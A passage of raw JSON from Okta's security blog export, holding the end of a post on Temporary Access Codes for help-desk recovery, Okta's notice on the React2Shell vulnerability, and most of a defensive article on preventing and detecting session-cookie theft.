minimum:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to read user information (“View Users and their Details”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to add a user to a specific group of users that are eligible for assigning Temporary Access Codes (“Edit user’s group membership,” 
“View groups and their details,” “Manage group membership”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to issue Temporary Access Codes (“Manage user's Temporary Access Code”)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More crucially, the custom helpdesk role would \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"no longer need\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" to be assigned permissions to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset a user’s password (“Reset users' passwords”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign a temporary password to a user (“Set users' temporary password”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reset the MFA factors of a user (“Reset users' authenticators”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enroll a user in MFA (“Enroll users' authenticators”)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once an inbound caller has verified their identity, a TAC issued to a user for account recovery could be constrained to 
be:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only valid for a few minutes\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used in conjunction with another previously enrolled factor (“authenticator method chaining”)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used from a specific set of locations\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Only used from a registered or managed device\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For guidance on how to use TACs as an account recovery factor, please refer to the following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/create-custom-admin-roles-for-user-account-recovery-processes\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"help desk article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Temporary Access Codes provide an opportunity to constrain the ability of help desk staff to reset user passwords and MFA factors."},"updatedAt":"2025-12-11T23:14:03.223Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  
Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/okta-response-to-react2shell","id":"ae240f16-af0c-5b54-bd73-54a4e658ff62","title":"Okta’s Response to React2Shell","date":"2025-12-05T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On December 3, 2025, the maintainers of React and Next.js disclosed a critical pre-authentication remote code execution (RCE) vulnerability in React Server Components (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-55182\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\") with a CVSS score of 
10.0.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerability impacts versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 of RSC, as well as all frameworks that support React Server Components, including Next.js (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nextjs.org/blog/CVE-2025-66478\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"CVE-2025-66478\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s Response\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has upgraded all production systems to fixed versions,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has published actions required for application developers that rely on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/center/s/article/developer-statement-react-server-components-critical-vulnerability-cve-2025-55182-action-required\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Developer-Statement-React-Server-Components-Critical-Vulnerability-CVE-2025-55182-Action-Required-Okta?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" 
SDKs to build React or Next.js applications,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we have detected opportunistic scanning activity on non-vulnerable systems, we have not observed successful exploitation of this vulnerability against Auth0 or Okta services.   \\n\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Action for Auth0 and Okta SDKs users\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For actions required and developer guidance, please refer to the appropriate KnowledgeBase article:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/center/s/article/developer-statement-react-server-components-critical-vulnerability-cve-2025-55182-action-required\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Auth0 React Server Components Critical Vulnerability (CVE-2025-55182) Action Required\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/Developer-Statement-React-Server-Components-Critical-Vulnerability-CVE-2025-55182-Action-Required-Okta?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta React Server Components Critical Vulnerability 
(CVE-2025-55182) Action Required\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Read on for Okta’s response to React2Shell (CVE-2025-55182) and to learn more about actions required by developers."},"updatedAt":"2025-12-05T12:38:36.424Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/sessioncookietheft","id":"f4032886-3e35-5313-b6d3-1d5ff60ff92b","title":"Defending against Session Hijacking","date":"2022-08-09T06:00:56+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multi-factor Authentication (MFA) is very effective at limiting what an adversary can do with a stolen password.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"According to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.googleblog.com/2019/05/new-research-how-effective-is-basic.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"research\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" commissioned by Google in 2019, MFA thwarted 99% of automated credential-based attacks and 93% of phishing campaigns. 
It remains one of the most essential and effective controls against account takeovers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In some circumstances (outlined below), MFA can be bypassed. Okta Threat Intelligence has observed the proliferation of malware designed to extract session cookies from the browser of an infected user, and increasing use of phishing techniques designed to bypass authenticators that rely on a shared secret.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both of these techniques rely on extracting a session cookie from the browser of a legitimate user that has already authenticated to an application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this article we will:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Explain how adversaries steal session cookies,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discuss how to defend against session cookie theft, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discuss approaches to detecting abuse of session cookies.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"About Session Cookies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session cookies are small blocks of data stored in a user’s browser after they 
sign in to a web application. The cookie includes an identifier generated by the app that helps keep track of a signed-in user, ensuring they won’t need to sign in again until the session expires or the user logs out.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If an attacker steals a session cookie and injects it into their browser, they can often access the same session as the legitimate user. The two most common techniques used to steal session cookies are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Malware infection on a legitimate user’s endpoint, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Phishing attacks that use transparent HTTP proxies (adversary-in-the-middle attacks).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cookie-hungry Malware\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Many of the most prevalent malware families observed today include ‘infostealer’ modules that have the ability to extract cookies from browser sessions running on an infected machine. 
The majority of malware families the US Cybersecurity and Infrastructure Security Agency (CISA) listed in its \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/uscert/ncas/alerts/aa22-216a\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Top 10 Malware Strains of 2021 report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are capable of stealing session cookies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This malware is often deployed via “cracked” (pirated) games or delivered as malspam. Once installed, these modules silently extract cookies, which are in turn bought and sold in dark web forums, occasionally accompanied by tools that attempt to mimic the browser configuration used by the target.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adversary-in-the-Middle Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attackers also use social engineering to obtain session cookies by directing users to a malicious website that is configured as a reverse proxy server. These phishing sites are able to relay requests between a targeted user and an impersonated web application. 
If a user is tricked into signing in to the legitimate web application via one of these malicious sites, the attacker can access the user’s credentials and the session token returned to the browser.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These attacks can be effective against user accounts protected only by factors that rely on codes sent via SMS, email or authenticator apps.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In any successful attack, the attacker is subject to the constraints of the stolen session: both its duration and the resources accessible during the session. If the legitimate user logs out (or is logged out by administrators), the session cookie is invalidated.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Defending Against Session Cookie Theft\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The advice below is also available to \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www-assets.okta.com/pdfs/sec.okta.com/Session_Cookie_Infographic_v2.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"download as an infographic\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Due to the variety of ways session cookies can be stolen, there is no single solution that will prevent their theft. 
We recommend a “defense in depth” approach to protecting your organization:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Endpoint protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" software can protect user devices against malware that extracts session cookies from the user’s browser. Okta offers \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with several EDR vendors that allow administrators to deny authentication requests from devices exhibiting poor security hygiene.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/09/phishing-resistance-and-why-it-matters\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong authenticators\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" such as WebAuthn, U2F keys, smart cards: these offer the strongest resistance to “Adversary-in-the-Middle” attacks. 
Okta FastPass also offers strong phishing resistance \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/configure-authenticators.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"in most deployment scenarios\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authentication policies\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can be used to restrict access to user accounts based on a range of customer-configurable prerequisites. We recommend administrators restrict access to applications to only those \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/guides/devices/devcontext-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (with Okta FastPass) and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools, and if they are assessed to have a 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"strong security posture\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". We also recommend forcing re-authentication every time a sensitive resource is accessed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny or perform step-up authentication on requests to access applications from rarely-used networks. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/network/network-zones.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", access can be limited by location, ASN (Autonomous System Number), IP, and IP-Type (which identifies known anonymizing proxies).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/behavior-detection/configure-behavior-detection.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Behavior Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to act (via step-up authentication) or alert (via System Log) when a user’s sign in behavior deviates from a previous pattern of activity.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fine-tune application session time-outs 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"based on the risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that unauthorized access to the data poses to the organization. This limits the window available for an attacker to exploit access to stolen session cookies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2022/10/human-factor-phishing-resistance\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. No matter how advanced the attacker’s infrastructure, most cookie thieves rely on social engineering. 
Make it easy for users to report potential issues by configuring \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Security/Security_General.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"End User Notifications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect administrative sessions: Take a \\\"Zero Standing Privileges\\\" approach to administrative access. Assign administrators \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles. Apply ASN and IP Session Binding (from Settings > Features) to all administrative apps to prevent the replay of stolen administrative sessions. 
Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protected Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (under Settings > Features) to force re-authentication whenever an administrative user attempts to perform sensitive actions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Talk to your SaaS partners about support for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession, Continuous Access Evaluation Profile (CAEP) and Universal Logout\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting Abuse of Session Cookies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Logs often contain the first signs of cookie theft. 
Authentication and Access Requests to Okta are logged in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/Reports_SysLog.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which can be viewed in the admin console, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/Reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"streamed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to security analytics tools or programmatically requested using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/api/system-log/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log API\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For more advice on common avenues for detection, we recommend the following resources:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/telling-more-okta-detection-stories-google-chronicle\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Telling More Okta Detection Stories with Google 
